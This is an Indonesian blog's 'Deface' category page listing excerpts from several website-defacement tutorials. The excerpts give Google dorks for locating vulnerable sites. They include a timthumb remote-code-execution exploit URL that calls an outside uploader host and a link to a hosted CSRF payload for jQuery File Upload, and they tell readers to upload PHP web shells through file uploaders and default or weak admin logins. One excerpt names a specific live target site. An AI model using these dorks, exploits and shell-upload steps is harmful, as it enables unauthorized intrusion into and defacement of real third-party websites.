Category: Deface

  • Tutorial Deface Dengan Cara Timthumb RCE

    Kali ini admin ganteng mau share cara deface nih, yap Deface Dengan Cara Timthumb langsung aja bahan bahannya DORK : inurl:timthumb.php?src=   [ SELEBIHNYA KEMBANGIN SENDIRI] EXPLOIT :?src=http://flickr.com.ehpet.net/uploader.php1. search di google pke dork di atas, kalau vuln tandanya seperti ini 2. Lalu masukkan exploitnya, maka akan seperti ini 3. Lalu dimana letak shellnya?, buka yg gw tandain…

  • Tutorial Deface Dengan Cara Component Uploader Drag And Drop

    Oke gw mau share tutorial Deface Dengan Cara Component Uploader Drag And DropLangsung aja ya gan DORK : intext:Drag&Drop files here [ Kembangin sendiri ]1. Dorking ke google pke dork tersebut 2. Lalu pilih salah satu website, Klo vuln muncul from upload sperti ini 3. OK upload shell kalian yg ext : .php .phtml .php5 Dll…

  • Tutorial Deface Dengan Cara PHP File Manager Default User & Password

    Yap wassap kali ini gw mau share tutorial  DEFACE DENGAN CARA PHP FILE MANAGER DEFAULT USER & PASSWORD Oh iya deface ini gk ribet kok, tinggal upload shell kalian, langsung aja ya caranya DORK inurl:”PHP FILE MANAGER” ext:php inurl:”filemanager” ext:php 1. lo dorking ke google atau bing atau search engine lainnya, lalu cari web yg…

  • Tutorial Upload Shell Di CMS Joomla

    halo gan karna gw udh nemu live target nya jadi gw disini mau share cara upload shell di joomla, yapMungkin kalo upload shell di CMS WordPress mah easy ya wkwkwk Berbeda dengan CMS Joomla Ok langsung aja gan 1. yg pasti lo harus udh login ke halaman administrator lah πŸ˜€ , Default login admin di…

  • Tutorial Deface Dengan Cara Bypass Admin

    Oh iya ane muncul mao tebar tutor yg simple neh buat yg baru belajar deface , nih ane kasih tutor DEFACE DENGAN CARA BYPASS ADMIN >:( oh iya ane mao tanya ne , klean semua ga pada malming ?? >:( , asulo joneszzsz awoakoakwkawko :V canda y asu :v .. dah ah langsung ja ya…

  • Tutorial Deface Dengan Cara TinyMce Plugins Image Manager

    Sebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorial Ok kali ini gw share deface POC TinyMce Plugins Image Manager caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpgOk langsung aja DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )Exploit : site.com/(path)/tinymce/plugins/image/upload.phpLive Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php1. Kalian dorking dulu…

  • Tutorial Deface Dengan Cara Jquery File Upload

    Kali ini gw ingin share teknik deface Jquery File Upload Cara deface ini memakai CSRF ya πŸ™‚ Dork = inurl:upload/server/php/             inurl:admin/upload/server/php         ( SELEBIHNYA KEMBANGKAN SENDIRI YA ) Atau chat di fanpage facebook ya di https://facebook.com/trollyoursystem CSRF = http://trolling-system.ooo/csrf-jquery.txt ( Upload / save di web ya, ubah site.com menjadi       …

  • Tutorial Deface Dengan Cara Admin Weak Password / Admin Poor Password

    Kali ini gw share Deface Dengan Cara Admin Weak Password / Admin Poor PasswordYap, teknik / cara deface ini cukup simple ya, tapi agak susah juga cari target nya sebenarnya gw udh dpet dri minggu kmren, cuman krna sibuk gan sama real life . jdi ga sempet nulis tutor Ok langsung aja DORK : inurl:admin123/login.php   …

  • Tutorial Deface Dengan Cara Download Database SQL

    Kali ini gw share tutorial deface ni ganDeface Dengan Cara Download Database SQLSekilas gw jelasin Jadi cara deface ini kita memanfaatkan dari si admin website tersebut, karena menyisipkan file database.sql nya di public_html πŸ˜€Saran gw untuk admin website lainnya, JANGAN PERNAH menyisipkan file yang penting di website, baik itu backup-an , database , user & password…

  • Tutorial Deface Dengan Cara URL Poisoning

    ok kali ini saya akan share Deface Dengan Cara URL Poisoning Cara ini cukup mudah kok , langsung aja ya caranya πŸ˜€ Sekilas gw jelasin sedikit apa itu URL Poisoning ?? URL Poisoning, juga dikenal sebagai ( Location Poisoning )Adalah metode pelacakan perilaku pengguna Web dengan menambahkan nomor identifikasi (ID) ke alamat halaman URL (Uniform Resource Locator)…